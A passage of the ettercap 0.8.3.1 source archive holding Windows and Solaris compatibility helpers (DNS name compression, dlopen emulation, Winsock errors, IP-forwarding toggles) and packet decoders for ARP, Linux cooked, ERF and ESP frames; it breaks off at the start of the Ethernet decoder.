SIGPROF case SIGPROF: return ("SIGPROF"); #endif #ifdef SIGSTAK case SIGSTAK: return ("SIGSTAK"); #endif #ifdef SIGBRK case SIGBRK: return ("SIGBRK"); #endif #ifdef SIGBUS case SIGBUS: return ("SIGBUS"); #endif #ifdef SIGIOT case SIGIOT: return ("SIGIOT"); #endif #ifdef SIGEMT case SIGEMT: return ("SIGEMT"); #endif #ifdef SIGSYS case SIGSYS: return ("SIGSYS"); #endif #ifdef SIGCHLD case SIGCHLD: return ("SIGCHLD"); #endif #ifdef SIGPWR case SIGPWR: return ("SIGPWR"); #endif #ifdef SIGWINCH case SIGWINCH: return ("SIGWINCH"); #endif #ifdef SIGPOLL case SIGPOLL: return ("SIGPOLL"); #endif #ifdef SIGCONT case SIGCONT: return ("SIGCONT"); #endif #ifdef SIGSTOP case SIGSTOP: return ("SIGSTOP"); #endif #ifdef SIGTSTP case SIGTSTP: return ("SIGTSTP"); #endif #ifdef SIGTTIN case SIGTTIN: return ("SIGTTIN"); #endif #ifdef SIGTTOU case SIGTTOU: return ("SIGTTOU"); #endif #ifdef SIGURG case SIGURG: return ("SIGURG"); #endif #ifdef SIGLOST case SIGLOST: return ("SIGLOST"); #endif #ifdef SIGDIL case SIGDIL: return ("SIGDIL"); #endif #ifdef SIGXCPU case SIGXCPU: return ("SIGXCPU"); #endif #ifdef SIGXFSZ case SIGXFSZ: return ("SIGXFSZ"); #endif } strncpy (buf, "Unknown ", 9); itoa (signo, buf+8, 10); return (buf); } /* * Unix process related stuff */ int ec_win_fork(void) { USER_MSG("fork() not yet supported\n"); errno = ENOSYS; return -1; } int ec_win_wait (int *status) { USER_MSG("wait() not yet supported\n"); errno = ENOSYS; (void) status; return -1; } /* * BIND resolver stuff: * * Expand compressed domain name 'comp_dn' to full domain name. * 'msg' is a pointer to the beginning of the message, * 'eom_orig' points to the first location after the message, * 'exp_dn' is a pointer to a buffer of size 'length' for the result. * Return size of compressed name or -1 if there was an error. */ #ifndef INDIR_MASK #define INDIR_MASK 0xc0 #endif #ifndef MAXLABEL #define MAXLABEL 63 /* maximum length of domain label */ #endif static int mklower (int ch) { if (isascii(ch) && isupper(ch)) return (tolower(ch)); return (ch); } /* * Search for expanded name from a list of previously compressed names. * Return the offset from msg if found or -1. * dnptrs is the pointer to the first name on the list, * not the pointer to the start of the message. */ static int dn_find (u_char *exp_dn, u_char *msg, u_char **dnptrs, u_char **lastdnptr) { u_char **cpp; for (cpp = dnptrs; cpp < lastdnptr; cpp++) { u_char *dn = exp_dn; u_char *sp = *cpp; u_char *cp = *cpp; int n; while ((n = *cp++) != 0) { /* * check for indirection */ switch (n & INDIR_MASK) { case 0: /* normal case, n == len */ while (--n >= 0) { if (*dn == '.') goto next; if (*dn == '\\') dn++; if (mklower(*dn++) != mklower(*cp++)) goto next; } if ((n = *dn++) == '\0' && *cp == '\0') return (sp - msg); if (n == '.') continue; goto next; case INDIR_MASK: /* indirection */ cp = msg + (((n & 0x3f) << 8) | *cp); break; default: /* illegal type */ return (-1); } } if (*dn == '\0') return (sp - msg); next: ; } return (-1); } int ec_win_dn_expand (const u_char *msg, const u_char *eom_orig, const u_char *comp_dn, char *exp_dn, int length) { const u_char *cp; char *dn, *eom; int c, n, len = -1, checked = 0; dn = exp_dn; cp = comp_dn; eom = exp_dn + length; /* Fetch next label in domain name */ while ((n = *cp++) != 0) { /* Check for indirection */ switch (n & INDIR_MASK) { case 0: if (dn != exp_dn) { if (dn >= eom) return (-1); *dn++ = '.'; } if (dn+n >= eom) return (-1); checked += n + 1; while (--n >= 0) { int c = *cp++; if ((c == '.') || (c == '\\')) { if (dn + n + 2 >= eom) return (-1); *dn++ = '\\'; } *dn++ = c; if (cp >= eom_orig) /* out of range */ return (-1); } break; case INDIR_MASK: if (len < 0) len = cp - comp_dn + 1; cp = msg + (((n & 0x3f) << 8) | (*cp & 0xff)); if (cp < msg || cp >= eom_orig) /* out of range */ return (-1); checked += 2; /* * Check for loops in the compressed name; * if we've looked at the whole message, * there must be a loop. */ if (checked >= eom_orig - msg) return (-1); break; default: return (-1); /* flag error */ } } *dn = '\0'; for (dn = exp_dn; (c = *dn) != '\0'; dn++) if (isascii(c) && isspace(c)) return (-1); if (len < 0) len = cp - comp_dn; return (len); } /* * Compress domain name 'exp_dn' into 'comp_dn'. * Return the size of the compressed name or -1. * 'length' is the size of the array pointed to by 'comp_dn'. * 'dnptrs' is a list of pointers to previous compressed names. dnptrs[0] * is a pointer to the beginning of the message. The list ends with NULL. * 'lastdnptr' is a pointer to the end of the arrary pointed to * by 'dnptrs'. Side effect is to update the list of pointers for * labels inserted into the message as we compress the name. * If 'dnptr' is NULL, we don't try to compress names. If 'lastdnptr' * is NULL, we don't update the list. */ int dn_comp (const char *exp_dn, u_char *comp_dn, int length, u_char **dnptrs, u_char **lastdnptr) { u_char *cp, *dn; u_char **cpp, **lpp, *eob; u_char *msg; u_char *sp = NULL; int c, l = 0; dn = (u_char *)exp_dn; cp = comp_dn; eob = cp + length; lpp = cpp = NULL; if (dnptrs) { msg = *dnptrs++; if (msg) { for (cpp = dnptrs; *cpp; cpp++) ; lpp = cpp; /* end of list to search */ } } else msg = NULL; for (c = *dn++; c != '\0'; ) { /* look to see if we can use pointers */ if (msg) { if ((l = dn_find (dn-1, msg, dnptrs, lpp)) >= 0) { if (cp+1 >= eob) return (-1); *cp++ = (l >> 8) | INDIR_MASK; *cp++ = l % 256; return (cp - comp_dn); } /* not found, save it */ if (lastdnptr && cpp < lastdnptr-1) { *cpp++ = cp; *cpp = NULL; } } sp = cp++; /* save ptr to length byte */ do { if (c == '.') { c = *dn++; break; } if (c == '\\') { if ((c = *dn++) == '\0') break; } if (cp >= eob) { if (msg) *lpp = NULL; return (-1); } *cp++ = c; } while ((c = *dn++) != '\0'); /* catch trailing '.'s but not '..' */ if ((l = cp - sp - 1) == 0 && c == '\0') { cp--; break; } if (l <= 0 || l > MAXLABEL) { if (msg) *lpp = NULL; return (-1); } *sp = l; } if (cp >= eob) { if (msg) *lpp = NULL; return (-1); } *cp++ = '\0'; return (cp - comp_dn); } /* * dlopen() emulation (should not be exported) */ static const char *last_func; static DWORD last_error; void *ec_win_dlopen (const char *dll_name, int flags _U_) { void *rc; last_func = "ec_win_dlopen"; rc = (void*) LoadLibrary (dll_name); if (rc) last_error = 0; else last_error = GetLastError(); return (rc); } void *ec_win_dlsym (const void *dll_handle, const char *func_name) { void *rc; last_func = "ec_win_dlsym"; rc = (void*) GetProcAddress ((HINSTANCE)dll_handle, func_name); if (rc) last_error = 0; else last_error = GetLastError(); return (rc); } void ec_win_dlclose (const void *dll_handle) { last_func = "ec_win_dlclose"; if (FreeLibrary((HMODULE)dll_handle)) last_error = 0; else last_error = GetLastError(); } const char *ec_win_dlerror (void) { static char errbuf[1024]; snprintf (errbuf, sizeof(errbuf)-1, "%s(): %s", last_func, ec_win_strerror(last_error)); return (errbuf); } /* * This function handles most / all (?) Winsock errors we're able to produce. */ #if !defined(USE_GETTEXT) #undef _ #define _(s) s #endif static char *get_winsock_error (int err, char *buf, size_t len) { char *p; switch (err) { case WSAEINTR: p = _("Call interrupted."); break; case WSAEBADF: p = _("Bad file"); break; case WSAEACCES: p = _("Bad access"); break; case WSAEFAULT: p = _("Bad argument"); break; case WSAEINVAL: p = _("Invalid arguments"); break; case WSAEMFILE: p = _("Out of file descriptors"); break; case WSAEWOULDBLOCK: p = _("Call would block"); break; case WSAEINPROGRESS: case WSAEALREADY: p = _("Blocking call progress"); break; case WSAENOTSOCK: p = _("Descriptor is not a socket."); break; case WSAEDESTADDRREQ: p = _("Need destination address"); break; case WSAEMSGSIZE: p = _("Bad message size"); break; case WSAEPROTOTYPE: p = _("Bad protocol"); break; case WSAENOPROTOOPT: p = _("Protocol option is unsupported"); break; case WSAEPROTONOSUPPORT: p = _("Protocol is unsupported"); break; case WSAESOCKTNOSUPPORT: p = _("Socket is unsupported"); break; case WSAEOPNOTSUPP: p = _("Operation not supported"); break; case WSAEAFNOSUPPORT: p = _("Address family not supported"); break; case WSAEPFNOSUPPORT: p = _("Protocol family not supported"); break; case WSAEADDRINUSE: p = _("Address already in use"); break; case WSAEADDRNOTAVAIL: p = _("Address not available"); break; case WSAENETDOWN: p = _("Network down"); break; case WSAENETUNREACH: p = _("Network unreachable"); break; case WSAENETRESET: p = _("Network has been reset"); break; case WSAECONNABORTED: p = _("Connection was aborted"); break; case WSAECONNRESET: p = _("Connection was reset"); break; case WSAENOBUFS: p = _("No buffer space"); break; case WSAEISCONN: p = _("Socket is already connected"); break; case WSAENOTCONN: p = _("Socket is not connected"); break; case WSAESHUTDOWN: p = _("Socket has been shut down"); break; case WSAETOOMANYREFS: p = _("Too many references"); break; case WSAETIMEDOUT: p = _("Timed out"); break; case WSAECONNREFUSED: p = _("Connection refused"); break; case WSAELOOP: p = _("Loop??"); break; case WSAENAMETOOLONG: p = _("Name too long"); break; case WSAEHOSTDOWN: p = _("Host down"); break; case WSAEHOSTUNREACH: p = _("Host unreachable"); break; case WSAENOTEMPTY: p = _("Not empty"); break; case WSAEPROCLIM: p = _("Process limit reached"); break; case WSAEUSERS: p = _("Too many users"); break; case WSAEDQUOT: p = _("Bad quota"); break; case WSAESTALE: p = _("Something is stale"); break; case WSAEREMOTE: p = _("Remote error"); break; case WSAEDISCON: p = _("Disconnected"); break; /* Extended Winsock errors */ case WSASYSNOTREADY: p = _("Winsock library is not ready"); break; case WSANOTINITIALISED: p = _("Winsock library not initialised"); break; case WSAVERNOTSUPPORTED: p = _("Winsock version not supported."); break; /* getXbyY() errors (already handled in herrmsg): Authoritative Answer: Host not found */ case WSAHOST_NOT_FOUND: p = _("Host not found"); break; /* Non-Authoritative: Host not found, or SERVERFAIL */ case WSATRY_AGAIN: p = _("Host not found, try again"); break; /* Non recoverable errors, FORMERR, REFUSED, NOTIMP */ case WSANO_RECOVERY: p = _("Unrecoverable error in call to nameserver"); break; /* Valid name, no data record of requested type */ case WSANO_DATA: p = _("No data record of requested type"); break; default: return NULL; } strncpy (buf, p, len); buf [len-1] = '\0'; return buf; } /* * A smarter strerror() */ #undef strerror char *ec_win_strerror (int err) { static char buf[512]; DWORD lang = MAKELANGID (LANG_NEUTRAL, SUBLANG_DEFAULT); DWORD flags = FORMAT_MESSAGE_FROM_SYSTEM | FORMAT_MESSAGE_IGNORE_INSERTS | FORMAT_MESSAGE_MAX_WIDTH_MASK; char *p; if (err >= 0 && err < sys_nerr) { strncpy (buf, strerror(err), sizeof(buf)-1); buf [sizeof(buf)-1] = '\0'; } else { if (!get_winsock_error (err, buf, sizeof(buf)) && !FormatMessage (flags, NULL, err, lang, buf, sizeof(buf)-1, NULL)) snprintf (buf, 512, "Unknown error %d (%#x)", err, err); } /* strip trailing '\r\n' or '\n'. */ p = strrchr (buf, '\n'); if (p && (p - buf) >= 2) *p = '\0'; p = strrchr (buf, '\r'); if (p && (p - buf) >= 1) *p = '\0'; return (buf); } #if defined(HAVE_NCURSES) && !defined(BUILDING_UTILS) int vwprintw (WINDOW *win, const char *fmt, va_list args) { char buf[1024]; if (trace_on) PDC_debug ("vwprintw() - called\n"); _vsnprintf (buf, sizeof(buf), fmt, args); return wprintw (win, buf); } #endif /* HAVE_NCURSES && !BUILDING_UTILS */ static void pdc_ncurses_init (void) { #if defined(HAVE_NCURSES) && !defined(BUILDING_UTILS) const char *env = getenv ("CURSES_TRACE"); if (env && atoi(env) > 0) { traceon(); putenv ("NCURSES_TRACE=1"); } putenv ("PDC_RESTORE_SCREEN=1"); putenv ("PDC_PRESERVE_SCREEN=1"); #if 0 /* if stdout is redirected, initscr() fails with * "LINES value must be >= 2 and <= x: got y" */ if (isatty(fileno(stdout)) <= 0) { putenv ("COLS=2"); putenv ("LINES=2"); } #endif #endif } /* * Check if we're linked as a GUI app. */ static BOOL is_gui_app (void) { const IMAGE_DOS_HEADER *dos; const IMAGE_NT_HEADERS *nt; HMODULE mod = GetModuleHandle (NULL); dos = (const IMAGE_DOS_HEADER*) mod; nt = (const IMAGE_NT_HEADERS*) ((const BYTE*)mod + dos->e_lfanew); return (nt->OptionalHeader.Subsystem == IMAGE_SUBSYSTEM_WINDOWS_GUI); } /* * Check that we're linked as a GUI application. Depending on how * we where started, we create or attach to parent console before * using printf() etc. If using GTK interface (option "-G"), don't * create a console. */ static void setup_console (void) { #if !defined(BUILDING_UTILS) BOOL (WINAPI *_AttachConsole)(DWORD) = NULL; HMODULE mod; DWORD rc = 0; STARTUPINFO inf; const char *cmd_line = GetCommandLine(); BOOL is_ec = (cmd_line && strstr(cmd_line,"ettercap")); BOOL use_gtk = (is_ec && strstr(cmd_line,"-G") != NULL); if (!is_ec || use_gtk) /* GTK UI shouldn't need a console */ return; /* Note: this is true even when started minimized * (nCmdShow == SW_MINIMISED), but fails if program started as * another user */ memset (&inf, 0, sizeof(inf)); GetStartupInfo (&inf); started_from_a_gui = (inf.dwFlags & STARTF_USESHOWWINDOW); /* check if correct linker option used */ if (!is_gui_app()) { MessageBox (NULL, "You must relink this application with\n" "\"-Wl,--subsystem,windows\"\n", "Error", MB_ICONEXCLAMATION | MB_SETFOREGROUND); exit (-1); } mod = GetModuleHandle ("kernel32.dll"); if (mod) _AttachConsole = (BOOL (WINAPI*)(DWORD)) GetProcAddress((HINSTANCE)mod, "AttachConsole"); attached_to_console = FALSE; /* If parent doesn't have a console, AttachConsole() will fail and * we use AllocConsole() instead. * Note: AttachConsole() was introduced in Win-2000, so for Win-ME/9x, * we simply try AllocConsole(). */ if (_AttachConsole) { if ((*_AttachConsole)(ATTACH_PARENT_PROCESS)) attached_to_console = TRUE; else rc = GetLastError(); } if (!attached_to_console && !AllocConsole()) { char error[256]; snprintf (error, 256, "AllocConsole failed; error %lu", GetLastError()); MessageBox (NULL, error, "Fatal", MB_ICONEXCLAMATION | MB_SETFOREGROUND); exit (-1); } /* Synchronise std-handles with the new console */ freopen ("CONIN$", "rt", stdin); freopen ("CONOUT$", "wt", stdout); freopen ("CONOUT$", "wt", stderr); #if 0 printf ("_AttachConsole %p, rc %lu, started_from_a_gui %d, attached_to_console %d\n", _AttachConsole, rc, started_from_a_gui, attached_to_console); #endif has_console = TRUE; #endif /* BUILDING_UTILS */ } static void __attribute__((destructor)) exit_console (void) { #if !defined(BUILDING_UTILS) if (!has_console) return; if (started_from_a_gui || !attached_to_console) { puts("\nPress any key to exit"); _getch(); } else { /* * The calling shell doesn't append a to the cmd-line when we exit a * GUI app. Get the prompt back by putting a in the console input queue. */ HANDLE hStdin = GetStdHandle(STD_INPUT_HANDLE); if (!started_from_a_gui && hStdin != INVALID_HANDLE_VALUE) { INPUT_RECORD rec; DWORD written; memset (&rec, 0, sizeof(rec)); rec.EventType = KEY_EVENT; rec.Event.KeyEvent.bKeyDown = TRUE; rec.Event.KeyEvent.wRepeatCount = 1; rec.Event.KeyEvent.wVirtualKeyCode = 13; rec.Event.KeyEvent.uChar.AsciiChar = 13; WriteConsoleInput(hStdin, &rec, 1, &written); } } FreeConsole(); /* free allocated or attached console */ has_console = FALSE; #endif } /* EOF */ ettercap-0.8.3.1/src/os/ec_solaris.c000664 000000 000000 00000013430 13711276346 017162 0ustar00rootroot000000 000000 /* ettercap -- solaris specific functions This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include #include #include #include #include static char saved_status[2]; #ifdef WITH_IPv6 static char saved_status_v6[2]; #endif /* open it with high privs and use it later */ static int fd; /*******************************************/ void disable_ip_forward(void) { struct strioctl strIo; char buf[65536]; char *cp; cp = "ip_forwarding"; memset(buf, '\0', sizeof(buf)); snprintf(buf, 13, "%s", cp); if ((fd = open("/dev/ip", O_RDWR)) < 0) ERROR_MSG("open failed for /dev/ip"); strIo.ic_cmd = ND_GET; strIo.ic_timout = 0; strIo.ic_len = sizeof(buf); strIo.ic_dp = buf; /* Call IOCTL to return status */ if ( (ioctl(fd, I_STR, (char *)&strIo)) == -1 ) ERROR_MSG("ioctl(I_STR)"); if (strIo.ic_cmd == ND_GET) { strncpy(saved_status, buf, 2); } DEBUG_MSG("disable_ip_forward -- previous value = %s", saved_status); memset(buf, '\0', sizeof(buf)); snprintf(buf, 13, "%s", cp); /* the format is "element"\0"value"\0 */ buf[strlen(buf) + 1] = '0'; strIo.ic_cmd = ND_SET; strIo.ic_timout = 0; strIo.ic_len = sizeof(buf); strIo.ic_dp = buf; if ( (ioctl(fd, I_STR, (char *)&strIo)) == -1 ) ERROR_MSG("ioctl(I_STR)"); DEBUG_MSG("Inet_DisableForwarding -- NEW value = 0"); atexit(restore_ip_forward); atexit(regain_privs_atexit); } void restore_ip_forward(void) { struct strioctl strIo; char buf[65536]; char *cp; /* no need to restore anything */ if (saved_status[0] == '0') return; cp = "ip_forwarding"; memset(buf, '\0', sizeof(buf)); snprintf(buf, 13, "%s", cp); /* the format is "element"\0"value"\0 */ snprintf(buf + strlen(buf)+1, 2, "%s", saved_status); DEBUG_MSG("ATEXIT: restore_ip_forward -- restoring to value = %s", saved_status); strIo.ic_cmd = ND_SET; strIo.ic_timout = 0; strIo.ic_len = sizeof(buf); strIo.ic_dp = buf; /* Call IOCTL to set the status */ if ( (ioctl(fd, I_STR, (char *)&strIo)) == -1 ) FATAL_ERROR("Please restore manually the ip_forwarding value to %s", saved_status); close(fd); } #ifdef WITH_IPV6 void disable_ipv6_forward(void) { struct strioctl strIo; char buf[65536]; char *cp; cp = "ip6_forwarding"; memset(buf, '\0', sizeof(buf)); snprintf(buf, 14, "%s", cp); if ((fd = open("/dev/ip", O_RDWR)) < 0) ERROR_MSG("open failed for /dev/ip"); strIo.ic_cmd = ND_GET; strIo.ic_timout = 0; strIo.ic_len = sizeof(buf); strIo.ic_dp = buf; /* Call IOCTL to return status */ if ( (ioctl(fd, I_STR, (char *)&strIo)) == -1 ) ERROR_MSG("ioctl(I_STR)"); if (strIo.ic_cmd == ND_GET) { strncpy(saved_status_v6, buf, 2); } DEBUG_MSG("disable_ipv6_forward -- previous value = %s", saved_status_v6); memset(buf, '\0', sizeof(buf)); snprintf(buf, 14, "%s", cp); /* the format is "element"\0"value"\0 */ buf[strlen(buf) + 1] = '0'; strIo.ic_cmd = ND_SET; strIo.ic_timout = 0; strIo.ic_len = sizeof(buf); strIo.ic_dp = buf; if ( (ioctl(fd, I_STR, (char *)&strIo)) == -1 ) ERROR_MSG("ioctl(I_STR)"); DEBUG_MSG("Inet6_DisableForwarding -- NEW value = 0"); atexit(restore_ipv6_forward); } void restore_ipv6_forward(void) { struct strioctl strIo; char buf[65536]; char *cp; /* no need to restore anything */ if (saved_status_v6[0] == '0') return; cp = "ip6_forwarding"; memset(buf, '\0', sizeof(buf)); snprintf(buf, 14, "%s", cp); /* the format is "element"\0"value"\0 */ snprintf(buf + strlen(buf)+1, 2, "%s", saved_status_v6); DEBUG_MSG("ATEXIT: restore_ipv6_forward -- restoring to value = %s", saved_status_v6); strIo.ic_cmd = ND_SET; strIo.ic_timout = 0; strIo.ic_len = sizeof(buf); strIo.ic_dp = buf; /* Call IOCTL to set the status */ if ( (ioctl(fd, I_STR, (char *)&strIo)) == -1 ) FATAL_ERROR("Please restore manually the ip6_forwarding value to %s", saved_status_v6); close(fd); } #endif /* * get the MTU parameter from the interface */ u_int16 get_iface_mtu(const char *iface) { int sock, mtu; struct ifreq ifr; #if !defined(ifr_mtu) && defined(ifr_metric) #define ifr_mtu ifr_metric #endif /* open the socket to work on */ sock = socket(PF_INET, SOCK_DGRAM, 0); if (sock == -1) FATAL_ERROR("Unable to open socket on interface for MTU query\n"); memset(&ifr, 0, sizeof(ifr)); strncpy(ifr.ifr_name, iface, sizeof(ifr.ifr_name)); /* get the MTU */ if ( ioctl(sock, SIOCGIFMTU, &ifr) < 0) { DEBUG_MSG("get_iface_mtu: MTU FAILED... assuming 1500"); mtu = 1500; } else { DEBUG_MSG("get_iface_mtu: %d", ifr.ifr_mtu); mtu = ifr.ifr_mtu; } close(sock); return mtu; } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/protocols/000775 000000 000000 00000000000 13711276346 016275 5ustar00rootroot000000 000000 ettercap-0.8.3.1/src/protocols/ec_arp.c000664 000000 000000 00000007543 13711276346 017703 0ustar00rootroot000000 000000 /* ettercap -- ARP decoder module Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include /* globals */ struct arp_header { u_int16 ar_hrd; /* Format of hardware address. */ u_int16 ar_pro; /* Format of protocol address. */ u_int8 ar_hln; /* Length of hardware address. */ u_int8 ar_pln; /* Length of protocol address. */ u_int16 ar_op; /* ARP opcode (command). */ #define ARPOP_REQUEST 1 /* ARP request. */ #define ARPOP_REPLY 2 /* ARP reply. */ #define ARPOP_RREQUEST 3 /* RARP request. */ #define ARPOP_RREPLY 4 /* RARP reply. */ }; struct arp_eth_header { u_int8 arp_sha[MEDIA_ADDR_LEN]; /* sender hardware address */ u_int8 arp_spa[IP_ADDR_LEN]; /* sender protocol address */ u_int8 arp_tha[MEDIA_ADDR_LEN]; /* target hardware address */ u_int8 arp_tpa[IP_ADDR_LEN]; /* target protocol address */ }; /* protos */ FUNC_DECODER(decode_arp); void arp_init(void); /*******************************************/ /* * this function is the initializer. * it adds the entry in the table of registered decoder */ void __init arp_init(void) { add_decoder(NET_LAYER, LL_TYPE_ARP, decode_arp); } FUNC_DECODER(decode_arp) { struct arp_header *arp; /* don't complain about unused var */ (void) DECODE_DATALEN; arp = (struct arp_header *)DECODE_DATA; /* * size of the whole packet is the size of the * header + size of the hard address + proto address * for the sender and the target */ DECODED_LEN = sizeof(struct arp_header) + 2 * (arp->ar_hln + arp->ar_pln); PACKET->L3.len = DECODED_LEN; PACKET->L3.header = (u_char *)DECODE_DATA; PACKET->L3.options = NULL; PACKET->L3.proto = htons(LL_TYPE_ARP); /* ARP discovered hosts are always local ;) */ PACKET->PASSIVE.flags |= FP_HOST_LOCAL; if (arp->ar_hln == MEDIA_ADDR_LEN && arp->ar_pln == IP_ADDR_LEN) { struct arp_eth_header *earp; earp = (struct arp_eth_header *)(arp + 1); ip_addr_init(&PACKET->L3.src, AF_INET, (u_char *)&earp->arp_spa); ip_addr_init(&PACKET->L3.dst, AF_INET, (u_char *)&earp->arp_tpa); /* * for ARP packets we can overwrite the L2 addresses with the * information within the ARP header */ memcpy(PACKET->L2.src, (char *)&earp->arp_sha, MEDIA_ADDR_LEN); memcpy(PACKET->L2.dst, (char *)&earp->arp_tha, MEDIA_ADDR_LEN); /* * HOOK POINT: HOOK_PACKET_ARP * differentiate between REQUEST and REPLY */ if (ntohs(arp->ar_op) == ARPOP_REQUEST) hook_point(HOOK_PACKET_ARP_RQ, po); else if (ntohs(arp->ar_op) == ARPOP_REPLY) hook_point(HOOK_PACKET_ARP_RP, po); /* ARP packets are always local (our machine is at distance 0) */ if (!ip_addr_cmp(&po->L3.src, &EC_GBL_IFACE->ip)) PACKET->L3.ttl = 0; else PACKET->L3.ttl = 1; /* HOOK_PACKET_ARP is for all type of arp, no distinctions */ hook_point(HOOK_PACKET_ARP, po); } return NULL; } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/protocols/ec_cooked.c000664 000000 000000 00000004463 13711276346 020363 0ustar00rootroot000000 000000 /* ettercap -- Linux cooked decoder module Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include /* globals */ #define COOKED_LEN 16 #define PROTO_OFFSET 14 #define SENT_BY_US 4 /* protos */ FUNC_DECODER(decode_cook); FUNC_ALIGNER(align_cook); void cook_init(void); /*******************************************/ /* * this function is the initializer. * it adds the entry in the table of registered decoder */ void __init cook_init(void) { add_decoder(LINK_LAYER, IL_TYPE_COOK, decode_cook); add_aligner(IL_TYPE_COOK, align_cook); } FUNC_DECODER(decode_cook) { FUNC_DECODER_PTR(next_decoder); u_int16 proto; u_int16 pck_type; char bogus_mac[6]="\x00\x01\x00\x01\x00\x01"; DECODED_LEN = COOKED_LEN; proto = pntos(DECODE_DATA + PROTO_OFFSET); pck_type = pntos(DECODE_DATA); PACKET->L2.header = (u_char *)DECODE_DATA; PACKET->L2.proto = IL_TYPE_COOK; PACKET->L2.len = DECODED_LEN; /* By default L2.src and L2.dst are NULL, so are equal to our * "mac address". According to packet type we set bogus source * or dest to help other decoders to guess if the packet is for us * (check_forwarded, set_forwardable_flag and so on) */ if (pck_type != SENT_BY_US) memcpy(PACKET->L2.src, bogus_mac, ETH_ADDR_LEN); else memcpy(PACKET->L2.dst, bogus_mac, ETH_ADDR_LEN); next_decoder = get_decoder(NET_LAYER, proto); EXECUTE_DECODER(next_decoder); return NULL; } /* * alignment function */ FUNC_ALIGNER(align_cook) { /* already aligned */ return 0; } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/protocols/ec_erf.c000664 000000 000000 00000004237 13711276346 017672 0ustar00rootroot000000 000000 /* ettercap -- ERF (endace) decoder module Copyright (C) The Ettercap Dev Team This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include /* globals */ struct erf_header { u_int32 timestamp1; u_int32 timestamp2; u_int8 type; u_int8 flags; u_int16 rlen; u_int16 color; u_int16 wlen; }; /* protos */ FUNC_DECODER(decode_erf); FUNC_ALIGNER(align_erf); void erf_init(void); /*******************************************/ /* * this function is the initializer. * it adds the entry in the table of registered decoder */ void __init erf_init(void) { add_decoder(LINK_LAYER, IL_TYPE_ERF, decode_erf); add_aligner(IL_TYPE_ERF, align_erf); } FUNC_DECODER(decode_erf) { FUNC_DECODER_PTR(next_decoder); struct erf_header *erf; DECODED_LEN = sizeof(struct erf_header); erf = (struct erf_header *)DECODE_DATA; /* check presence of extension header */ if (erf->type & 0x80) { // "ERF Extension header not supported" return NULL; } /* HOOK POINT : HOOK_PACKET_ERF */ hook_point(HOOK_PACKET_ERF, po); /* ethernet packets */ if (erf->type == 0x02) { /* remove the padding */ DECODED_LEN += 2; /* leave the control to the ethernet decoder */ next_decoder = get_decoder(LINK_LAYER, IL_TYPE_ETH); EXECUTE_DECODER(next_decoder); } return NULL; } /* * alignment function */ FUNC_ALIGNER(align_erf) { return 0; } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/protocols/ec_esp.c000664 000000 000000 00000004070 13711276346 017700 0ustar00rootroot000000 000000 /* ettercap -- ESP decoder module Copyright (C) CaptainMcSpankyPants This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include /* globals */ struct esp_header { uint32_t spi; /* Security Parameters Index */ uint32_t seq; /* Sequence Number */ }; /* protos */ FUNC_DECODER(decode_esp); void esp_init(void); /*******************************************/ /* * this function is the initializer. * it adds the entry in the table of registered decoder */ void __init esp_init(void) { add_decoder(PROTO_LAYER, NL_TYPE_ESP, decode_esp); } FUNC_DECODER(decode_esp) { FUNC_DECODER_PTR(next_decoder); struct esp_header *esp; esp = (struct esp_header *)DECODE_DATA; DECODED_LEN = sizeof(struct esp_header); /* L4 header definition */ PACKET->L4.proto = NL_TYPE_ESP; /* since ICMPv6 header has no such field */ PACKET->L4.len = PACKET->L3.payload_len; PACKET->L4.header = (u_char*)DECODE_DATA; PACKET->L4.options = NULL; PACKET->L4.optlen = 0; PACKET->L4.flags = 0; PACKET->DATA.data = ((u_char *)esp) + sizeof(struct esp_header); /* HOOK POINT: HOOK_PACKET_ESP */ hook_point(HOOK_PACKET_ESP, po); /* get the next decoder */ next_decoder = get_decoder(APP_LAYER, PL_DEFAULT); EXECUTE_DECODER(next_decoder); return NULL; } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/protocols/ec_eth.c000664 000000 000000 00000005346 13711276346 017700 0ustar00rootroot000000 000000 /* ettercap -- ETH decoder module Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under 